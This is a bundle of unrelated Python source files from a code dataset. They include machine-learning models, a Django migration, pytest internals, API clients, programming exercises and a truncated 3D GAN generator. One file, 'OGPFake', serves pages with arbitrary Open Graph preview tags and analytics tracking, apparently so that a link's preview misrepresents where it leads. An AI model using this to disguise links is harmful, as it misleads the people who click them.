conv_rep_atten = torch.cat([conv_out, atten_c2h, conv_out * atten_c2h, conv_out * atten_h2c], dim=-1)
conv_rep_atten = F.relu(self.layer1(conv_rep_atten))
conv_rep_atten = F.relu(self.layer2(conv_rep_atten))
sorted_conv_rep_atten = conv_rep_atten[sorted_conv_indices]
packed_conv_rep_atten = rnn_utils.pack_padded_sequence(sorted_conv_rep_atten, sorted_conv_turn_nums, batch_first=True)
_, self.model_hidden = self.model_lstm(packed_conv_rep_atten, self.model_hidden)
if self.bi_direction:
model_out = torch.cat([self.model_hidden[0][-2], self.model_hidden[0][-1]], dim=1)
else:
model_out = self.model_hidden[0][-1]
model_out = model_out[desorted_conv_indices]
conv_labels = self.final(self.out_layer(model_out).view(-1))
return conv_labels, model_out
| StarcoderdataPython |
3369311 | <filename>pythonExercicios/ex092.py<gh_stars>0
from datetime import datetime as dt
dados = {}
dados['Nome'] = input('Nome: ')
nasc = int(input('Ano de nascimento: '))
novos_dados = {
'Idade': dt.now().year - nasc,
'Carteira de trabalho': int(input('Carteira de trabalho (0 não tem):'))}
dados.update(novos_dados)
if dados['Carteira de trabalho'] > 0:
novos_dados = {
'Ano de contratação': int(input('Ano de contratação: ')),
'Salário': float(input('Salário: '))}
dados.update(novos_dados)
dados['Idade de aposentadoria'] = 35 + dados['Ano de contratação'] - nasc
print('-='*30)
for k, i in dados.items():
print(f'{k} tem o valor de {i}')
| StarcoderdataPython |
1732346 | # -*- coding: utf-8 -*-
# Generated by Django 1.11.15 on 2018-10-12 13:19
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('projects', '0004_reviews_average'),
]
operations = [
migrations.RemoveField(
model_name='reviews',
name='average',
),
]
| StarcoderdataPython |
3206280 | """
Views for OGPFake
This view gathers all necessary tags from GET request,
then gets information from enviromental variables and renders the final page.
<NAME>, 2018, https://github.com/Naeriam
"""
import os
from django.shortcuts import render
def ogpfake(request):
# Get all necessary tags of the GET request
ga_tracking_id = None if 'ga_tracking_id' not in request.GET else os.getenv(request.GET.get('ga_tracking_id'))
title = None if 'title' not in request.GET else os.getenv(request.GET.get('title'))
description = None if 'description' not in request.GET else os.getenv(request.GET.get('description'))
url = None if 'url' not in request.GET else os.getenv(request.GET.get('url'))
image = None if 'image' not in request.GET else os.getenv(request.GET.get('image'))
# Error control
error_text = '{0} has not been especified. Ensure you have a KEY name in your GET request ' \
'and a VALUE in your Heroku Config Vars'
errors = []
if not ga_tracking_id:
errors.append(error_text.format('Google Analytics ID'))
if not title:
errors.append(error_text.format('A title for your link'))
if not description:
errors.append(error_text.format('A description for your link'))
if not url:
errors.append(error_text.format('A destination URL'))
if not image:
errors.append(error_text.format('An image for your link'))
# Render web page
return render(request, 'ogpfake.html', {
'ga_tracking_id': ga_tracking_id,
'title': title,
'description': description,
'url': url,
'image': image,
'errors': errors,
})
| StarcoderdataPython |
3305145 | """
support for presenting detailed information in failing assertions.
"""
import py
import sys
from _pytest.monkeypatch import monkeypatch
from _pytest.assertion import util
def pytest_addoption(parser):
group = parser.getgroup("debugconfig")
group.addoption('--assert', action="store", dest="assertmode",
choices=("rewrite", "reinterp", "plain",),
default="rewrite", metavar="MODE",
help="""control assertion debugging tools.
'plain' performs no assertion debugging.
'reinterp' reinterprets assert statements after they failed to provide assertion expression information.
'rewrite' (the default) rewrites assert statements in test modules on import
to provide assert expression information. """)
group.addoption('--no-assert', action="store_true", default=False,
dest="noassert", help="DEPRECATED equivalent to --assert=plain")
group.addoption('--nomagic', '--no-magic', action="store_true",
default=False, help="DEPRECATED equivalent to --assert=plain")
class AssertionState:
"""State for the assertion plugin."""
def __init__(self, config, mode):
self.mode = mode
self.trace = config.trace.root.get("assertion")
def pytest_configure(config):
mode = config.getvalue("assertmode")
if config.getvalue("noassert") or config.getvalue("nomagic"):
mode = "plain"
if mode == "rewrite":
try:
import ast # noqa
except ImportError:
mode = "reinterp"
else:
# Both Jython and CPython 2.6.0 have AST bugs that make the
# assertion rewriting hook malfunction.
if (sys.platform.startswith('java') or
sys.version_info[:3] == (2, 6, 0)):
mode = "reinterp"
if mode != "plain":
_load_modules(mode)
m = monkeypatch()
config._cleanup.append(m.undo)
m.setattr(py.builtin.builtins, 'AssertionError',
reinterpret.AssertionError) # noqa
hook = None
if mode == "rewrite":
hook = rewrite.AssertionRewritingHook() # noqa
sys.meta_path.insert(0, hook)
warn_about_missing_assertion(mode)
config._assertstate = AssertionState(config, mode)
config._assertstate.hook = hook
config._assertstate.trace("configured with mode set to %r" % (mode,))
def pytest_unconfigure(config):
hook = config._assertstate.hook
if hook is not None:
sys.meta_path.remove(hook)
def pytest_collection(session):
# this hook is only called when test modules are collected
# so for example not in the master process of pytest-xdist
# (which does not collect test modules)
hook = session.config._assertstate.hook
if hook is not None:
hook.set_session(session)
def pytest_runtest_setup(item):
def callbinrepr(op, left, right):
hook_result = item.ihook.pytest_assertrepr_compare(
config=item.config, op=op, left=left, right=right)
for new_expl in hook_result:
if new_expl:
# Don't include pageloads of data unless we are very
# verbose (-vv)
if (len(py.builtin._totext('').join(new_expl[1:])) > 80*8
and item.config.option.verbose < 2):
new_expl[1:] = [py.builtin._totext(
'Detailed information truncated, use "-vv" to see')]
res = py.builtin._totext('\n~').join(new_expl)
if item.config.getvalue("assertmode") == "rewrite":
# The result will be fed back a python % formatting
# operation, which will fail if there are extraneous
# '%'s in the string. Escape them here.
res = res.replace("%", "%%")
return res
util._reprcompare = callbinrepr
def pytest_runtest_teardown(item):
util._reprcompare = None
def pytest_sessionfinish(session):
hook = session.config._assertstate.hook
if hook is not None:
hook.session = None
def _load_modules(mode):
"""Lazily import assertion related code."""
global rewrite, reinterpret
from _pytest.assertion import reinterpret # noqa
if mode == "rewrite":
from _pytest.assertion import rewrite # noqa
def warn_about_missing_assertion(mode):
try:
assert False
except AssertionError:
pass
else:
if mode == "rewrite":
specifically = ("assertions which are not in test modules "
"will be ignored")
else:
specifically = "failing tests may report as passing"
sys.stderr.write("WARNING: " + specifically +
" because assert statements are not executed "
"by the underlying Python interpreter "
"(are you using python -O?)\n")
pytest_assertrepr_compare = util.assertrepr_compare
| StarcoderdataPython |
3207431 | <reponame>joshriess/InfraBot<filename>agent/agent.py
import requests
from time import sleep
timeToWait = 300 # Time to wait between callouts (in seconds)
while (True):
# Get list of commands to run this callout
URL = "https://slack.flemingcaleb.com:5000/api/agent/4/command/"
r = requests.get(url=URL)
if r.status_code == requests.codes.ok:
# Process the list of requests
print(r)
elif r.status_code == requests.codes.not_found:
# No list this time
print("No list this time")
else:
#Handle Unintended Error
print("ERROR")
sleep(timeToWait)
| StarcoderdataPython |
4827558 | # -*- coding: utf-8 -*-
from __future__ import absolute_import, unicode_literals
from optionaldict import optionaldict
from teambition.api.base import TeambitionAPI
class Teams(TeambitionAPI):
def get(self, id=None, organization_id=None, project_id=None):
"""
获取团队
详情请参考
http://docs.teambition.com/wiki/teams#teams-get
:param id: 可选,团队 ID
:param organization_id: 可选,组织 ID
:param project_id: 可选,项目 ID
:return: 返回的 JSON 数据包
"""
if id:
endpoint = 'api/teams/{0}'.format(id)
else:
endpoint = 'api/teams'
params = optionaldict(
_organizationId=organization_id,
_projectId=project_id
)
return self._get(endpoint, params=params)
def create(self, name, organization_id=None):
"""
新建团队
详情请参考
http://docs.teambition.com/wiki/teams#teams-create
:param name: 团队名称
:param organization_id: 可选,组织ID
:return: 返回的 JSON 数据包
"""
data = optionaldict(
name=name,
_organizationId=organization_id
)
return self._post(
'api/teams',
data=data
)
def delete(self, id):
"""
删除团队
详情请参考
http://docs.teambition.com/wiki/teams#teams-delete
:param id: 团队 ID
:return: 返回的 JSON 数据包
"""
return self._delete('api/teams/{0}'.format(id))
def update(self, id, name):
"""
更新团队
详情请参考
http://docs.teambition.com/wiki/teams#teams-update
:param id: 团队 ID
:param name: 团队名称
"""
return self._put(
'api/teams/{0}'.format(id),
data={
'name': name
}
)
def bind_project(self, id, project_id):
"""
关联团队与项目
详情请参考
http://docs.teambition.com/wiki/teams#teams-bind-project
:param id: 团队 ID
:param project_id: 项目 ID
:return: 返回的 JSON 数据包
"""
return self._put('api/teams/{0}/projects/{1}'.format(id, project_id))
def unbind_project(self, id, project_id):
"""
取消关联团队与项目
详情请参考
http://docs.teambition.com/wiki/teams#teams-unbind-project
:param id: 团队 ID
:param project_id: 项目 ID
:return: 返回的 JSON 数据包
"""
return self._delete(
'api/teams/{0}/projects/{1}'.format(id, project_id)
)
def add_members(self, id, email):
"""
添加团队成员
详情请参考
http://docs.teambition.com/wiki/teams#teams-add-member
:param id: 团队 ID
:param email: 邮箱或邮箱列表
:return: 返回的 JSON 数据包
"""
return self._post(
'api/teams/{0}/members'.format(id),
data={
'email': email
}
)
create_members = add_members
def remove_member(self, id, user_id):
"""
删除团队成员
详情请参考
http://docs.teambition.com/wiki/teams#teams-remove-member
:param id: 团队 ID
:param user_id: 成员 ID
:return: 返回的 JSON 数据包
"""
return self._delete(
'api/teams/{0}/members/{1}'.format(id, user_id)
)
def get_members(self, id, user_id=None):
"""
获取团队成员
详情请参考
http://docs.teambition.com/wiki/teams#teams-get-member
:param id: 团队 ID
:param user_id: 可选,用户 ID
:return: 返回的 JSON 数据包
"""
if user_id:
endpoint = 'api/teams/{0}/members/{1}'.format(id, user_id)
else:
endpoint = 'api/teams/{0}/members'.format(id)
return self._get(endpoint)
def quit(self, id):
"""
退出团队
详情请参考
http://docs.teambition.com/wiki/teams#teams-quit
:param id: 团队 ID
:return: 返回的 JSON 数据包
"""
return self._put('api/teams/{0}/quit'.format(id))
def get_memeber_tasks(self, id, member_id, start_date=None):
"""
获取团队成员任务
详情请参考
http://docs.teambition.com/wiki/teams#teams-get-team-member-tasks
:param id: 团队 ID
:param member_id: 成员 ID
:param start_date: 可选,起始日期,默认为当周的起始日期
:return: 返回的 JSON 数据包
"""
params = optionaldict(startDate=start_date)
return self._get(
'api/teams/{0}/members/{1}/tasks'.format(id, member_id),
params=params
)
def get_member_events(self, id, member_id, start_date=None):
"""
获取团队成员日程
详情请参考
http://docs.teambition.com/wiki/teams#teams-get-team-member-events
:param id: 团队 ID
:param member_id: 成员 ID
:param start_date: 可选,起始日期,默认为当周的起始日期
:return: 返回的 JSON 数据包
"""
params = optionaldict(startDate=start_date)
return self._get(
'api/teams/{0}/members/{1}/events'.format(id, member_id),
params=params
)
def get_tasks(self, id, start_date=None):
"""
获取团队周任务
详情请参考
http://docs.teambition.com/wiki/teams#teams-get-team-week-tasks
:param id: 团队 ID
:param start_date: 可选,起始日期,默认为当周的起始日期
:return: 返回的 JSON 数据包
"""
params = optionaldict(startDate=start_date)
return self._get(
'api/teams/{0}/tasks'.format(id),
params=params
)
def get_events(self, id, start_date=None):
"""
获取团队周日程
详情请参考
http://docs.teambition.com/wiki/teams#teams-get-team-week-events
:param id: 团队 ID
:param start_date: 可选,起始日期,默认为当周的起始日期
:return: 返回的 JSON 数据包
"""
params = optionaldict(startDate=start_date)
return self._get(
'api/teams/{0}/events'.format(id),
params=params
)
| StarcoderdataPython |
1677832 | # stdlib
from enum import Enum
from typing import List
from typing import Optional
# third party
from google.protobuf.reflection import GeneratedProtocolMessageType
from nacl.signing import VerifyKey
# relative
from ...... import deserialize
from ...... import serialize
from ......logger import critical
from ......logger import debug
from ......logger import traceback
from ......logger import traceback_and_raise
from ......proto.core.node.domain.service.request_message_pb2 import (
RequestMessage as RequestMessage_PB,
)
from .....common import UID
from .....common.message import ImmediateSyftMessageWithoutReply
from .....common.serde.serializable import serializable
from .....io.address import Address
from ...client import Client
from ...node import Node
from ..accept_or_deny_request.accept_or_deny_request_messages import (
AcceptOrDenyRequestMessage,
)
class RequestStatus(Enum):
Pending = 1
Rejected = 2
Accepted = 3
# TODO: this message conflates Message functionality with Manager/Request_API functionality
# TODO: this needs to be split into two separate pieces of functionality.
@serializable()
class RequestMessage(ImmediateSyftMessageWithoutReply):
__slots__ = ["name", "request_description", "request_id"]
def __init__(
self,
object_id: UID,
address: Address,
requester_verify_key: VerifyKey,
owner_address: Address,
status: Optional[str] = "",
request_type: Optional[str] = "",
date: Optional[str] = "",
object_tags: Optional[List[str]] = None,
object_type: str = "",
request_description: str = "",
request_id: Optional[UID] = None,
owner_client_if_available: Optional[Client] = None,
destination_node_if_available: Optional[Node] = None,
timeout_secs: Optional[int] = None,
requested_budget: Optional[float] = 0.0,
current_budget: Optional[float] = 0.0,
user_name: Optional[str] = "",
user_role: Optional[str] = "",
user_email: Optional[str] = "",
):
if request_id is None:
request_id = UID()
super().__init__(address=address, msg_id=request_id)
self.object_tags = object_tags if object_tags else []
self.object_type = object_type
self.request_description = request_description
self.request_id = request_id
self.requester_verify_key = requester_verify_key
self.object_id = object_id
self.owner_address = owner_address
self.owner_client_if_available = owner_client_if_available
self.destination_node_if_available = destination_node_if_available
self.timeout_secs = timeout_secs
self._arrival_time: Optional[float] = None
self.status: Optional[str] = status
self.date: Optional[str] = date
self.request_type: Optional[str] = request_type
self.user_name: Optional[str] = user_name
self.user_email: Optional[str] = user_email
self.user_role: Optional[str] = user_role
self.requested_budget: float = requested_budget # type: ignore
self.current_budget: float = current_budget # type: ignore
def accept(self) -> None:
self.send_msg(accept=True)
def approve(self) -> None:
self.accept()
def grant(self) -> None:
self.accept()
def deny(self) -> None:
self.send_msg(accept=False)
def send_msg(self, accept: bool) -> None:
action_name = "Accept" if accept else "Deny"
if self.owner_client_if_available is not None:
msg = AcceptOrDenyRequestMessage(
address=self.owner_client_if_available.address,
accept=accept,
request_id=self.id,
)
self.owner_client_if_available.send_immediate_msg_without_reply(msg=msg)
elif self.destination_node_if_available is not None:
msg = AcceptOrDenyRequestMessage(
address=self.destination_node_if_available.address,
accept=accept,
request_id=self.id,
)
try:
node = self.destination_node_if_available
router = node.immediate_msg_without_reply_router
service = router[type(msg)]
service.process(
node=self.destination_node_if_available,
msg=msg,
verify_key=self.destination_node_if_available.root_verify_key,
)
except Exception as e:
traceback(e)
critical(f"Tried to {action_name} Message on Node. {e}")
debug(f"{action_name} Request: " + str(self.id))
else:
log = f"No way to dispatch {action_name} Message."
critical(log)
traceback_and_raise(Exception(log))
def reject(self) -> None:
self.deny()
def withdraw(self) -> None:
self.deny()
@property
def arrival_time(self) -> Optional[float]:
return self._arrival_time
def set_arrival_time(self, arrival_time: float) -> None:
# used to expire requests as their destination, this should never be serialized
if self._arrival_time is None:
self._arrival_time = arrival_time
def _object2proto(self) -> RequestMessage_PB:
msg = RequestMessage_PB()
msg.object_tags.extend(self.object_tags)
msg.object_type = self.object_type
msg.status = self.status
msg.request_type = self.request_type
msg.date = self.date
msg.user_name = self.user_name
msg.user_email = self.user_email
msg.user_role = self.user_role
msg.requested_budget = self.requested_budget if self.requested_budget else 0.0
msg.current_budget = self.current_budget if self.current_budget else 0.0
msg.request_description = self.request_description
msg.request_id.CopyFrom(serialize(obj=self.request_id))
msg.target_address.CopyFrom(serialize(obj=self.address))
msg.object_id.CopyFrom(serialize(obj=self.object_id))
msg.owner_address.CopyFrom(serialize(obj=self.owner_address))
msg.requester_verify_key = bytes(self.requester_verify_key)
# -1 will represent no timeout, where as 0 is a valid value for timing out
# immediately after checking if there is a rule in place to accept or deny
if self.timeout_secs is None or self.timeout_secs < 0:
self.timeout_secs = -1
msg.timeout_secs = int(self.timeout_secs)
return msg
@staticmethod
def _proto2object(proto: RequestMessage_PB) -> "RequestMessage":
request_msg = RequestMessage(
request_id=deserialize(blob=proto.request_id),
status=proto.status,
request_type=proto.request_type,
date=proto.date,
object_tags=proto.object_tags,
object_type=proto.object_type,
user_name=proto.user_name,
user_email=proto.user_email,
user_role=proto.user_role,
requested_budget=proto.requested_budget,
current_budget=proto.current_budget,
request_description=proto.request_description,
address=deserialize(blob=proto.target_address),
object_id=deserialize(blob=proto.object_id),
owner_address=deserialize(blob=proto.owner_address),
requester_verify_key=VerifyKey(proto.requester_verify_key),
timeout_secs=proto.timeout_secs,
)
request_msg.request_id = deserialize(blob=proto.request_id)
return request_msg
@staticmethod
def get_protobuf_schema() -> GeneratedProtocolMessageType:
return RequestMessage_PB
| StarcoderdataPython |
1633036 | <reponame>ada-shen/utility
import os
import sys
import tensorflow as tf
BASE_DIR = os.path.dirname(os.path.abspath(__file__))
sys.path.append(BASE_DIR)
sys.path.append(os.path.join(BASE_DIR, 'models'))
sys.path.append(os.path.join(BASE_DIR, 'tf_utils'))
import tf_util
from pointSIFT_util import pointSIFT_module, pointSIFT_res_module, pointnet_fp_module, pointnet_sa_module, pointSIFT_nores_module
def placeholder_inputs(batch_size, num_point):
pointclouds_pl = tf.placeholder(tf.float32, shape=(batch_size, num_point, 3))
labels_pl = tf.placeholder(tf.int32, shape=(batch_size))
# smpws_pl = tf.placeholder(tf.float32, shape=(batch_size, num_point))
return pointclouds_pl, labels_pl
def get_model(point_cloud, is_training, num_class, bn_decay=None, feature=None):
""" Semantic segmentation PointNet, input is B x N x 3, output B x num_class """
batch_size = point_cloud.get_shape()[0].value
end_points = {}
l0_xyz = point_cloud
l0_points = feature
# end_points['l0_xyz'] = l0_xyz
### without res module part###
c0_l0_xyz, c0_l0_points, c0_l0_indices = pointSIFT_nores_module(l0_xyz, l0_points, radius=0.1, out_channel=64, is_training=is_training, bn_decay=bn_decay, scope='layer0_c0', merge='concat')
l1_xyz, l1_points, l1_indices = pointnet_sa_module(c0_l0_xyz, c0_l0_points, npoint=1024, radius=0.1, nsample=32, mlp=[64,128], mlp2=None, group_all=False, is_training=is_training, bn_decay=bn_decay, scope='layer1')
c0_l1_xyz, c0_l1_points, c0_l1_indices = pointSIFT_nores_module(l1_xyz, l1_points, radius=0.25, out_channel=128, is_training=is_training, bn_decay=bn_decay, scope='layer1_c0')
l2_xyz, l2_points, l2_indices = pointnet_sa_module(c0_l1_xyz, c0_l1_points, npoint=256, radius=0.2, nsample=32, mlp=[128,256], mlp2=None, group_all=False, is_training=is_training, bn_decay=bn_decay, scope='layer2')
c0_l2_xyz, c0_l2_points, c0_l2_indices = pointSIFT_nores_module(l2_xyz, l2_points, radius=0.5, out_channel=256, is_training=is_training, bn_decay=bn_decay, scope='layer2_c0')
l3_xyz, l3_points, l3_indices = pointnet_sa_module(c0_l2_xyz, c0_l2_points, npoint=64, radius=0.4, nsample=32, mlp=[256,512], mlp2=None, group_all=False, is_training=is_training, bn_decay=bn_decay, scope='layer3')
c0_l3_xyz, c0_l3_points, c0_l3_indices = pointSIFT_nores_module(l3_xyz, l3_points, radius=0.85, out_channel=512, is_training=is_training, bn_decay=bn_decay, scope='layer3_c0')
l4_xyz, l4_points, l4_indices = pointnet_sa_module(c0_l3_xyz, c0_l3_points, npoint=None, radius=None, nsample=None, mlp=[512,1024], mlp2=None, group_all=True, is_training=is_training, bn_decay=bn_decay, scope='layer4')
# FC layers
net = tf_util.conv1d(l4_points, 512, 1, padding='VALID', bn=True, is_training=is_training, scope='fc1', bn_decay=bn_decay)
net = tf_util.dropout(net, keep_prob=0.7, is_training=is_training, scope='dp1')
net = tf_util.conv1d(net, 256, 1, padding='VALID', bn=True, is_training=is_training, scope='fc2', bn_decay=bn_decay)
net = tf_util.dropout(net, keep_prob=0.7, is_training=is_training, scope='dp2')
net = tf_util.conv1d(net, num_class, 1, padding='VALID', activation_fn=None, scope='fc3')
net = tf.squeeze(net)
return net, end_points
def get_loss(pred, label):
"""
:param pred: BxNxC
:param label: BxN
:param smpw: BxN
:return:
"""
loss = tf.nn.sparse_softmax_cross_entropy_with_logits(labels=label, logits=pred)
classify_loss = tf.reduce_mean(loss)
tf.summary.scalar('classify loss', classify_loss)
tf.add_to_collection('losses', classify_loss)
return classify_loss
| StarcoderdataPython |
3352059 | <gh_stars>1-10
import sys
sys.path.append('..')
from intcode.intcode import IntCodeComputer
GRID_RADIUS = 100
BLACK = 0
WHITE = 1
LEFT = 0
RIGHT = 1
# Left moves left through array and vice versa.
AROUND = [(0, -1), (1, 0), (0, 1), (-1, 0)]
class HullPaintingRobot:
def __init__(self, start_on_white=False):
self.ic = IntCodeComputer(list(map(lambda m: int(m), open('input').readline().split(','))))
self.ic.debugging = False
self.painted = []
self.grid = []
for y in range(0, 2 * GRID_RADIUS):
self.grid.append([BLACK] * (GRID_RADIUS * 2))
self.painted.append([False] * (GRID_RADIUS * 2))
self.pos = (GRID_RADIUS, GRID_RADIUS)
if start_on_white:
self.grid[self.pos[1]][self.pos[0]] = WHITE
self.direction_index = 0
def print_grid(self):
for y in range(0, len(self.grid)):
line = ''
for num in self.grid[y]:
if num == BLACK:
line += ' '
else:
line += '*'
print(line)
def paint_until_halt(self):
while self.ic.halted == False:
(x, y) = self.pos
[to_paint, turn_direction] = self.step(self.grid[y][x])
self.grid[y][x] = to_paint
self.painted[y][x] = True
self.direction_index += -1 if LEFT == turn_direction else 1
self.direction_index += 4
self.direction_index = self.direction_index % 4
self.pos = [self.pos[0] + AROUND[self.direction_index][0], self.pos[1] + AROUND[self.direction_index][1]]
num_painted = 0
for y in range(0, len(self.painted)):
for x in range(0, len(self.painted[y])):
if self.painted[y][x]:
num_painted += 1
print('Painted at least once: %d' % (num_painted))
def step(self, over_color):
assert(len(self.ic.inputs)) == 0
self.ic.inputs = [over_color]
while len(self.ic.outputs) != 2:
self.ic.step()
ret = self.ic.outputs
self.ic.outputs = []
return ret
| StarcoderdataPython |
127977 | <filename>setup.py<gh_stars>1-10
from setuptools import setup, find_packages
setup(
name='pyclics-clustering',
version='1.0.1.dev0',
description="clustering algorithms for CLICS networks",
long_description=open("README.md").read(),
long_description_content_type='text/markdown',
author='<NAME> and <NAME>',
author_email='<EMAIL>',
url='https://github.com/clics/pyclics-clustering',
classifiers=[
'Development Status :: 4 - Beta',
'Intended Audience :: Science/Research',
'Operating System :: OS Independent',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
],
packages=find_packages(where='src'),
package_dir={'': 'src'},
include_package_data=True,
zip_safe=False,
python_requires='>=3.5',
install_requires=[
'attrs>=18.2',
'python-louvain',
'networkx==2.1',
'pyclics>=2.0.0',
],
extras_require={
'dev': [
'tox',
'flake8',
'wheel',
'twine',
],
'test': [
'mock',
'pytest>=3.6',
'pytest-mock',
'pytest-cov',
'coverage>=4.2',
],
},
entry_points={
'clics.plugin': ['clustering=pyclics_clustering:includeme'],
},
)
| StarcoderdataPython |
1724582 | <reponame>rootulp/exercism<filename>python/beer-song/beer.py
class Beer:
LAST_LINE = ('Go to the store and buy some more, '
'99 bottles of beer on the wall.')
@classmethod
def song(cls, start, stop):
return "\n".join([cls.verse(verse_num) for verse_num
in reversed(list(range(stop, start + 1)))]) + "\n"
@classmethod
def verse(cls, verse_num):
return "\n".join((cls.prefix(verse_num), cls.suffix(verse_num))) + "\n"
@classmethod
def prefix(cls, verse_num):
return ('%(quantity)s %(container)s of beer on the wall, '
'%(quantity)s %(container)s of beer.'
% cls.vals_for(verse_num)).capitalize()
@classmethod
def suffix(cls, verse_num):
if verse_num == 0:
return cls.LAST_LINE
else:
return ('Take %(cardinality)s down and pass it around, '
'%(quantity)s %(container)s of beer on the wall.'
% cls.vals_for(verse_num - 1))
@classmethod
def vals_for(cls, num):
return {'quantity': cls.quantity(num),
'container': cls.container(num),
'cardinality': cls.cardinality(num)}
@staticmethod
def quantity(num):
return 'no more' if num == 0 else str(num)
@staticmethod
def container(num):
return 'bottle' if num == 1 else 'bottles'
@staticmethod
def cardinality(num):
return 'it' if num == 0 else 'one'
def verse(verse_num):
return Beer.verse(verse_num)
def song(start, stop=0):
return Beer.song(start, stop)
| StarcoderdataPython |
1709147 | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import numpy as np
from tqdm import tqdm
from abc import ABCMeta, abstractmethod
import paddle
import paddle.nn as nn
from paddle.io import DataLoader
from paddlemm.models import CMML, NIC, SCAN, SGRAF, AoANet, EarlyFusion, LateFusion, LMFFusion, TMCFusion, VSEPP, IMRAM
from paddlemm.datasets import BasicDataset, SemiDataset, PretrainDataset, SampleDataset
DatasetMap = {
'basic': BasicDataset,
'semi': SemiDataset,
'sample': SampleDataset,
'pretrain': PretrainDataset
}
ModelMap = {
'cmml': CMML,
'nic': NIC,
'scan': SCAN,
'vsepp': VSEPP,
'imram': IMRAM,
'sgraf': SGRAF,
'aoanet': AoANet,
'earlyfusion': EarlyFusion,
'latefusion': LateFusion,
'lmffusion': LMFFusion,
'tmcfusion': TMCFusion
}
class BaseTrainer(metaclass=ABCMeta):
def __init__(self, opt):
self.model_name = opt.model_name.lower()
self.out_root = opt.out_root
self.logger = opt.logger
self.num_epochs = opt.num_epochs
self.batch_size = opt.batch_size
self.learning_rate = opt.learning_rate
self.task = opt.task
self.weight_decay = opt.get('weight_decay', 0.)
self.pretrain_epochs = opt.get('pretrain_epochs', 0)
self.num_workers = opt.get('num_workers', 0)
self.val_epoch = opt.get('val_epoch', 1)
# choose metric for select best model during training
self.select_metric = opt.get('select_metric', 'loss')
self.dataset = DatasetMap[opt.data_mode](**opt)
opt.vocab_size = self.dataset.vocab_size
opt.vocab = str(self.dataset.word2idx)
self.model = ModelMap[opt.model_name.lower()](**opt)
self.grad_clip = opt.get('grad_clip', 0)
if self.grad_clip:
self.grad_clip = nn.clip.ClipGradByValue(opt.grad_clip)
else:
self.grad_clip = None
self.step_size = opt.get('step_size', 0)
self.gamma = opt.get('gamma', 0.1)
if self.step_size:
self.scheduler = paddle.optimizer.lr.StepDecay(learning_rate=self.learning_rate, step_size=self.step_size,
gamma=self.gamma)
self.optimizer = paddle.optimizer.Adam(parameters=self.model.parameters(),
learning_rate=self.scheduler,
weight_decay=self.weight_decay,
grad_clip=self.grad_clip)
else:
self.optimizer = paddle.optimizer.Adam(parameters=self.model.parameters(),
learning_rate=self.learning_rate,
weight_decay=self.weight_decay,
grad_clip=self.grad_clip)
def train(self):
if self.pretrain_epochs > 0:
self.pretrain()
for epoch in range(1, self.num_epochs + 1):
all_loss = []
self.model.train()
train_loader = DataLoader(self.dataset.train_(),
batch_size=self.batch_size,
shuffle=True,
num_workers=self.num_workers)
train_tqdm = tqdm(train_loader(), ncols=80)
for idx, batch in enumerate(train_tqdm):
batch['epoch'] = epoch
loss = self.model(batch)
loss.backward()
self.optimizer.step()
self.optimizer.clear_grad()
all_loss.append(loss.item())
train_tqdm.set_description("Epoch: {} | Loss: {:.3f}".format(epoch, loss.item()))
train_tqdm.close()
if self.step_size:
self.scheduler.step()
paddle.save(self.model.state_dict(), os.path.join(self.out_root, 'temp.pdparams'))
if epoch % self.val_epoch == 0:
val_res = self.evaluate()
if self.select_metric == 'loss':
if val_res['loss'] < self.best_loss:
self.best_loss = val_res['loss']
paddle.save(self.model.state_dict(), os.path.join(self.out_root, 'best_model.pdparams'))
self.logger.info("Epoch: {}, valid loss: {:.3f}, Best: {:.3f}".format(epoch, val_res['loss'], self.best_loss))
else:
if val_res[self.select_metric] > self.best_score:
self.best_score = val_res[self.select_metric]
paddle.save(self.model.state_dict(), os.path.join(self.out_root, 'best_model.pdparams'))
self.logger.info("Epoch: {}, valid score: {:.3f}, Best: {:.3f}".format(epoch, val_res[self.select_metric],
self.best_score))
def pretrain(self):
# for cmml pretraining
self.model.train()
for epoch in range(1, self.pretrain_epochs + 1):
all_loss = []
train_loader = DataLoader(self.dataset.train_(),
batch_size=self.batch_size * 8, # mul 8 to train total supervised data
shuffle=True,
num_workers=self.num_workers)
train_tqdm = tqdm(train_loader(), ncols=80)
for idx, batch in enumerate(train_tqdm):
self.optimizer.clear_grad()
loss = self.model.pretrain(batch)
loss.backward()
self.optimizer.step()
all_loss.append(loss.item())
train_tqdm.set_description("Pretrain epoch: {} | Loss: {:.3f}".format(epoch, np.mean(all_loss)))
@abstractmethod
def evaluate(self):
pass
@abstractmethod
def test(self):
pass
| StarcoderdataPython |
3365976 | <gh_stars>0
import numpy as np
import tensorflow as tf
from tensorflow.keras.models import Model
from tensorflow.keras.layers import Input, Flatten, Conv3D, Conv3DTranspose, Dropout, ReLU, LeakyReLU, Concatenate, ZeroPadding3D
from tensorflow.keras.optimizers import Adam
from tensorflow.keras.losses import MeanSquaredError
import tensorflow_addons as tfa
from tensorflow_addons.layers import InstanceNormalization
def Generator():
'''
Generator model
'''
def encoder_step(layer, Nf, ks, norm=True):
x = Conv3D(Nf, kernel_size=ks, strides=2, kernel_initializer='he_normal', padding='same')(layer)
if norm:
x = InstanceNormalization()(x)
x = LeakyReLU()(x)
x = Dropout(0.2)(x)
return x
def bottlenek(layer, Nf, ks):
x = Conv3D(Nf, kernel_size=ks, strides=2, kernel_initializer='he_normal', padding='same')(layer)
x = InstanceNormalization()(x)
x = LeakyReLU()(x)
for i in range(4):
y = Conv3D(Nf, kernel_size=ks, strides=1, kernel_initializer='he_normal', padding='same')(x)
x = InstanceNormalization()(y)
x = LeakyReLU()(x)
x = Concatenate()([x, y])
return x
def decoder_step(layer, layer_to_concatenate, Nf, ks):
x = Conv3DTranspose(Nf, kernel_size=ks, strides=2, padding='same', kernel_initializer='he_normal')(layer)
x = InstanceNormalization()(x)
x = LeakyReLU()(x)
x = Concatenate()([x, layer_to_concatenate])
x = Dropout(0.2)(x)
return x
layers_to_concatenate = []
inputs = Input((128,128,128,4), name='input_image')
Nfilter_start = 64
depth = 4
ks = 4
x = inputs
# encoder
for d in range(depth-1):
if d==0:
x = encoder_step(x, Nfilter_start*np.power(2,d), ks, False)
else:
x = encoder_step(x, Nfilter_start*np.power(2,d), ks)
layers_to_concatenate.append(x)
# bottlenek
x = bottlenek(x, Nfilter_start*np.power(2,depth-1), ks)
# decoder
for d in range(depth-2, -1, -1):
x = decoder_step(x, layers_to_concatenate.pop(), Nfilter_start*np.power(2,d), ks)
# classifier
